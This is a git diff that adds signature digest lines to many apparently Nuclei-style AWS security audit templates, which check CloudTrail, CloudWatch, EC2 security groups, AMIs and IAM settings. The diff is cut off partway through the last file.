--git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml index 2d7cddc180..a1d4fa922d 100644 --- a/cloud/aws/aws-code-env.yaml +++ b/cloud/aws/aws-code-env.yaml @@ -50,3 +50,4 @@ code: - type: dsl dsl: - '"AWS CLI is properly configured for account \"" + account + "\" and all the necessary tools required are installed"' +# digest: 4b0a00483046022100a05a196d8113f7a6f2a0ad341f9cecb882fe6fb7067812b6fc3d60482a736759022100a2d1867891aecfc696770bef70553de20c1cf97b6dbb29a4158fee3a08522c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml index 8235790afb..a66f25bb45 100644 --- a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture resource operations performed on or within an AWS cloud resource"' +# digest: 490a0046304402201faa9752ffea7342ad3012c17528ce7ac93a419f258bc0022f82daca0c116b060220047829932aa4d96d6a578faf2884e39bb46badf9ec8f4f4704a2cabdc2cc93a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml index 02d390ce8f..2c279064b7 100644 --- a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to receive log files from all the AWS cloud regions"' +# digest: 490a0046304402201443ece0d6b4fbc1cddf7c13cedcdea324540e873081d0b64225178ee3dc2d1402203d677bdd02490a8f5a90d8e2abfa5499df844303bd18b1c2250ee3737a6ce1c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml index a95dc037ce..f33fbb19fd 100644 --- a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Ensure only one trail in Amazon CloudTrail is configured for global service events to avoid duplicates: " + trail' +# digest: 4a0a00473045022100863a23e0d723ae8fd1912b96f52fdd5a22168d4fedd110138ac6b8e75434ef83022040c6c4f2d88276a08fc5faa9c4601c70615bcf8d0969cbe2dbf642c7f8186b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml index 45f449db75..51a2568a98 100644 --- a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' +# digest: 4a0a004730450221009edff671d27bdeaf0556428297d56afb1404ff3032d9ae4b61578c2b239ec4c502202ea0baf81ef1917992591736e8dfd44578f85f84bbb8c869fca718fecefac3c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml index a8af247688..cdb9e2d23c 100644 --- a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to send events to CloudWatch Logs for monitoring purposes"' +# digest: 4a0a00473045022003841e6c5e526ca9c51573554cb8b79f921518607b91025823f13325bc700fd7022100c936d849e5d2106d6079dc7524894c444881996c94755ba76bff9a313b01b47b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml index 34620d5e35..7feef84f70 100644 --- a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The log file integrity validation is not enabled for CloudTrail trail" + trail' +# digest: 4a0a00473045022100facdee59eb1d2eca53313cf4f8de941c2f7a0857645f153ad2a64c81b51d9a67022059981aa1842b49de13fc78b6673e74c755632f673f08c402ad66f59074cc2e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 9c8c8a57de..77d0213470 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"' +# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml index be843d5ead..4cae24dead 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -70,3 +70,4 @@ code: - type: dsl dsl: - '"The MFA Delete feature is not enabled for the S3 bucket " + bucket + " associated with the CloudTrail " + trail' +# digest: 490a00463044022042298637fc3947aaaab32dc59fb448c2c08e310bc0ca8a81f04d219b3e3643e4022029d99b37008c16622b5f08d7c27548c42cbfa80b8face6e766a180fe14abb003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml index 3802e9c2f2..d206f2aed3 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture management operations performed on your AWS cloud resources"' +# digest: 4a0a00473045022071c61afb61f0c431e2f7edf10563f582ede9a3a52e70a847ac8c6423758f5777022100e921cca38de3640c42ba86369837d9015c0b7b371c218eac3281f789392f77bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml index 8aa86677c9..6a8584340e 100644 --- a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' +# digest: 4a0a00473045022039127acbaf7f578247fb47cdfe1a2fdd2a67e57bca815a7786011743df98451c022100c8e1b247da863d14ae8ba023a1f7d05ea77faf28cc1d1c4eb5752c0976d54b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml index 61e1cd7821..ef93d42d16 100644 --- a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -70,3 +70,4 @@ code: - type: dsl dsl: - '"Access logging is not enabled for the S3 bucket associated with CloudTrail trail " + trail' +# digest: 4a0a00473045022100fc881c1ddc9a2e0229e8f3fbac211a1e5c3b7dac4363cd0611c002a55f455dc602201c3c0d885e1b03e7c10a09dbe42871bd2eeb1ffb62360ece9e5297a0d07e6953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml index d3f2a0c2ea..eea6307c9b 100644 --- a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -71,3 +71,4 @@ code: - type: dsl dsl: - '"The Object Lock feature is not enabled for the S3 bucket associated with the CloudTrail trail " + trail' +# digest: 4b0a00483046022100cdae2dc4719a039aae0873a5c1a1b4f5797593a1f555ee93a6752d408a181ebd022100f0decf46ad9b338bbcd2ea531acf088dcb76a0e605d9d7032130351113b92b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml index efc9744ec1..5d5a969bd9 100644 --- a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm +" is not configured with any actions for the ALARM state."' +# digest: 4a0a004730450220699edd21da9a908d8160230a38300e78c76cce31988d83565ed8b7a0c9b41d70022100c607f34933362074e992f81390dae32347f888ffa68a9d97aac8aad03a388f55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml index 411aa8202c..d3d3bf23e9 100644 --- a/cloud/aws/cloudwatch/cw-alarms-actions.yaml +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm + " does not have any active actions configured"' +# digest: 4b0a00483046022100c25b4a5bed3d8e28421708a03ab05c2b09f619f6c38472a34377d2db18e4d730022100d057819cf7fbf55503e3a93b82daa4b438fb204056422e34bbcb5a6ddb4d425e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml index c0376b38cc..d10f792c17 100644 --- a/cloud/aws/ec2/ec2-imdsv2.yaml +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'ami + " is publically shared"' +# digest: 4b0a00483046022100a9c93182cc816c3d5bc33cf11b0b8fa7f667153ee8f1c742c1c50da21309f666022100eec3b3b58d54dc9609e9b3b5cbe5feefd239ed07c12958cf75456d961aa3258a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml index adb57df74b..97edc1e31d 100644 --- a/cloud/aws/ec2/ec2-public-ip.yaml +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The Amazon Instance " + ec2instance + " uses public IP addresses"' +# digest: 4a0a00473045022100f1dcc6e7fab82b9688102b0f02fddc8c9930007bc885800ac26e4e5ea412ed670220667fdf2d67ebff9d4346a853856402dbd78197c727feae253e6629f53de0f957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml index e5eb85abfc..77bbec7c2d 100644 --- a/cloud/aws/ec2/ec2-sg-egress-open.yaml +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted outbound traffic"' +# digest: 490a0046304402200e8c75db5d5e8809d4e97173605a8d845e49d80bd788de5a7ba6cefc77f9110202200e57d1342300e4858c189e8dd15e8084cbf17f2f75ab3f8fbe8134979f4a6bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml index e53408c87b..5734057e9b 100644 --- a/cloud/aws/ec2/ec2-sg-ingress.yaml +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted inbound traffic"' +# digest: 4b0a004830460221009b9e3e94679739de1a688c3b15bc4f592472272245df9bfbc675211eeaa6f45602210097597c2bae7f04a1d2440e25e37986679daa91e6e8fe277cb1fb99874d2e5fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-cifs.yaml b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml index a15b72f7a8..973098b7bf 100644 --- a/cloud/aws/ec2/ec2-unrestricted-cifs.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 445"' +# digest: 4a0a00473045022100d07b38ee532d1cb1f6cca8d1384049e416bf72bae10727fe3f0fdd70bddf65730220384a7997d216466edabd10fe2f011460f0ade329929e41bf322977aac2d21a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-dns.yaml b/cloud/aws/ec2/ec2-unrestricted-dns.yaml index 2ccc1dd1c7..9890836e91 100644 --- a/cloud/aws/ec2/ec2-unrestricted-dns.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-dns.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 53"' +# digest: 490a0046304402207a2ebb618db4c24fc0d9e868b09e8689a7ccee1c419c1e446d549e2231bf20d202202c9b7cdcef58014affe10a86649a319995447be182a50a5910e13f4911bb9676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-ftp.yaml b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml index 85856d6d37..15c0fed896 100644 --- a/cloud/aws/ec2/ec2-unrestricted-ftp.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 20 or 21"' +# digest: 4a0a0047304502205f388ef25cd4e10ea8b0ca947a8100c1b849e7503e01c6485d3d23c30e190d16022100a24ea5679098a9da74b661c8375a32c2e91cb9e9e82682ffdd981cc1b1c78e79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-http.yaml b/cloud/aws/ec2/ec2-unrestricted-http.yaml index f37a2f9185..b75d877373 100644 --- a/cloud/aws/ec2/ec2-unrestricted-http.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-http.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 80"' +# digest: 490a00463044022039ebe4ac309956dc8ff7776b17a3982b8cfeadd66b69889950778ef07fca54e3022046047a1017a92794e037d6ad1472d3365ca94835c8071764cad1e8996d99eae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-https.yaml b/cloud/aws/ec2/ec2-unrestricted-https.yaml index ba085352ae..c4939cb9ab 100644 --- a/cloud/aws/ec2/ec2-unrestricted-https.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-https.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 443"' +# digest: 4a0a00473045022011c3ec5cdc908912df52c3e254be0010bede95ce080cf0083b2080a5b08b3779022100d719db5872cfb0485e6384332bf6b256c00ce754226c59fd1f4a9ce5d7956750:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-icmp.yaml b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml index f59e789e42..5b0bce764f 100644 --- a/cloud/aws/ec2/ec2-unrestricted-icmp.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml @@ -35,3 +35,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted ICMP access (0.0.0.0/0 or ::/0)"' +# digest: 4a0a0047304502201c1e1628656627c21447c7abc8072f76f2a62c9d1e6cadb470ecb80db95258ce022100b4302e8fb947bc6c9bdcd1344ce69898da49781c66a9574bba9bd2eb7920ed35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-memcached.yaml b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml index 4a1c68ee72..1a0e2e69f9 100644 --- a/cloud/aws/ec2/ec2-unrestricted-memcached.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 11211"' +# digest: 490a0046304402202b6556d6f2df24efabf60ee89f51b5d4d241a0017dfc7b025c95824cdcc26e290220204a2254be4259786fc50401c47fbb35ad21e621c90cf829f74c56d8297ef644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml index cdd29bdea1..a8644e0e93 100644 --- a/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml @@ -36,3 +36,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 27017"' +# digest: 4b0a0048304602210083e0104b459e8885610b9980b58d725caea579be4660fb40a27750097b47336d022100bc5f067c97ab723d4b4282cfabbf3795e702259686d1d368963d120707913ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-mssql.yaml b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml index 572d3da4b5..5ea67dea98 100644 --- a/cloud/aws/ec2/ec2-unrestricted-mssql.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1433"' +# digest: 4a0a0047304502207fea1bdfd1275fd4132e71cafa55258390fdaaa1ed649df3bbac41baa9abf1b2022100965299640f42e2ce5f12a3f624939a120518421a38e91ecbcdcdbae3066a6843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-mysql.yaml b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml index 92a53d114b..5fc050e037 100644 --- a/cloud/aws/ec2/ec2-unrestricted-mysql.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 3306"' +# digest: 4a0a00473045022100ff19bb5e8c3dfe1f8e153bd309d866713f3e33c0b54882652f6489cc4bac292c02200d43740086e393886f7dbaca0a05947741687ed853c8e128a7b53bc2d926d995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-netbios.yaml b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml index 2dc70d4563..bad57ee6a9 100644 --- a/cloud/aws/ec2/ec2-unrestricted-netbios.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on ports 137, 138 or 139"' +# digest: 4b0a00483046022100b04e63ff33e72a571e6fd0e696ab8a39a420f24de0a1d398686da93124a96e50022100bc0a89161a20972f692bba232833227053093823f47628cbb97ca0564c8d6c54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml index 73a0f533c6..de4c5ecc56 100644 --- a/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 9200"' +# digest: 490a004630440220592b35acadc3d541d7bab687bb36ff879999897d4c57bee946714c37eef4c37a0220303632eb1d63cfd0d31301ed29423993181942dae0da7a842b80921b989b6b4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-oracle.yaml b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml index c454cc071e..295f3776ab 100644 --- a/cloud/aws/ec2/ec2-unrestricted-oracle.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1521"' +# digest: 490a00463044022016b07bbcc6591afe7642ce52428085c7c2e5f2d923acb812a880bc658d607d5a022073f1dc85bb8b3e17f760ded2efa94b2aea4c14a6eb0fa135a1adb12bf604084a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml index 17892c9b99..e11ac521b0 100644 --- a/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 5432"' +# digest: 4a0a004730450221009dc490795c723cfe321511e129d2e6ff3de628de4b81979843eae48bb1b3ba7502200ffde00d7cb8957a0b72aa8bd39b4adde0bbc0236d7b671dd8eade57d62b69bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-rdp.yaml b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml index e211ff4c4c..db537892da 100644 --- a/cloud/aws/ec2/ec2-unrestricted-rdp.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 3389"' +# digest: 4a0a00473045022002ecd5ab647c14882b81b474962bb00f2efc2099d867125b8deb662e1c7a8e70022100877b207077fd1c5a89c0529f98c757af212d85b0d086a8ef00052ebc9005f0a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-redis.yaml b/cloud/aws/ec2/ec2-unrestricted-redis.yaml index f0afa166e2..1295c7aea3 100644 --- a/cloud/aws/ec2/ec2-unrestricted-redis.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-redis.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 6379"' +# digest: 4b0a00483046022100a19a6281bbac4a97ec0b09a1eaa1f789d3eb364bb152c2110e8aacaba4da4895022100c385619aae77905775c394990ef99a35e78f11941d2cb7579db73b2f6a4ef013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-smtp.yaml b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml index 52d5305b6f..6a1f64c7b9 100644 --- a/cloud/aws/ec2/ec2-unrestricted-smtp.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 25"' +# digest: 490a0046304402207f49f7b3e8b59a10d998936b7fa721458e3659599ca2f4f284aedc250af454e902206668d8d3207fa24654b24c96d1df3b590be443aa8f26d5ed0e2a6e7bef4919a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-ssh.yaml b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml index 6ce8ac9003..32b9614dee 100644 --- a/cloud/aws/ec2/ec2-unrestricted-ssh.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 22"' +# digest: 4a0a0047304502205ba8e3a283bd695b4f0267dab41892b97e7ea38371e15259616ac64c78fe117c0221008ab0347e4be89942208e1bf266891d41678a76a3ec0ce920f060d80429539688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-unrestricted-telnet.yaml b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml index e5a460a541..0c24c6f442 100644 --- a/cloud/aws/ec2/ec2-unrestricted-telnet.yaml +++ b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml @@ -34,3 +34,4 @@ code: - type: dsl dsl: - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 23"' +# digest: 4a0a004730450221009249024faa045e4c4a777389a760b53b294ea9285a93048a108e694ffdb7401302201be48e1ed82fb8dc69023ae0a15c891a5592f4c00d1c979e07e084456aed7bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml index a00e97dbdf..f371872c2f 100644 --- a/cloud/aws/ec2/publicly-shared-ami.yaml +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'ami + " AMI is publically shared"' +# digest: 4a0a004730450220193e6725ccb97bbd7071e4dad36601e0e8625dd4901a653eacf3141faf6e8a82022100d7d61c14183f4a6563ac749634aa9af5e01332d52583cba6e703cf4958bbe63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml index 23a1731df7..07452176fe 100644 --- a/cloud/aws/ec2/unencrypted-aws-ami.yaml +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'ami + " AMI is not encrypted"' +# digest: 4a0a00473045022100a7b00e475c508994eab83d044d65086d511d0dcdde83abed644133c35775d4a402203ff217b94895c174e5d6036a27c3cedba4e74cc0b2a4fb957b71390c2d7454eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-access-analyzer.yaml b/cloud/aws/iam/iam-access-analyzer.yaml index a18f274de1..60e905f26f 100644 --- a/cloud/aws/iam/iam-access-analyzer.yaml +++ b/cloud/aws/iam/iam-access-analyzer.yaml @@ -26,3 +26,4 @@ code: - type: dsl dsl: - '"IAM Access Analyzer is not Used in your AWS account"' +# digest: 4a0a00473045022030390836bad5e6468e11d2dbf56d7f809db536831d633867e2d605ec841e8b9d022100ea2e18d9be8f713b472d94507e0df31148e1a1403df2ba103fbf8dacee76173d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-expired-ssl.yaml b/cloud/aws/iam/iam-expired-ssl.yaml index b52895fa1e..948bc47dd2 100644 --- a/cloud/aws/iam/iam-expired-ssl.yaml +++ b/cloud/aws/iam/iam-expired-ssl.yaml @@ -27,3 +27,4 @@ code: - type: dsl dsl: - 'certificate + " Certificate is expired in your AWS account"' +# digest: 490a0046304402203c1c60995a3652d60b90c6b18c6aa5e9239fa9cc964b9ccd50e5e1660af1ab29022055d501dd4c86142b75633db268ceb4a226c09b9e1e69b04c8cc7278b5f4fdf48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml index 3539d31dc1..e48897a0c8 100644 --- a/cloud/aws/iam/iam-full-admin-privileges.yaml +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -49,3 +49,4 @@ code: - type: dsl dsl: - '"The IAM policy " + policy +" is Overly Permissive"' +# digest: 4a0a0047304502203eeeb24dbf1cfd3f41550e0c0b66bfb9ba23ea9912139aa2385e48b3a668d336022100dcb4c90fbb816ab247ea9d506497b900640b3d052bb2ce2b2f8b9a9e7fe58d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml index e79b02a28b..e8525012ee 100644 --- a/cloud/aws/iam/iam-key-rotation-90days.yaml +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -47,3 +47,4 @@ code: - type: dsl dsl: - '"The IAM Key " + accesskey +" is older than 90 days"' +# digest: 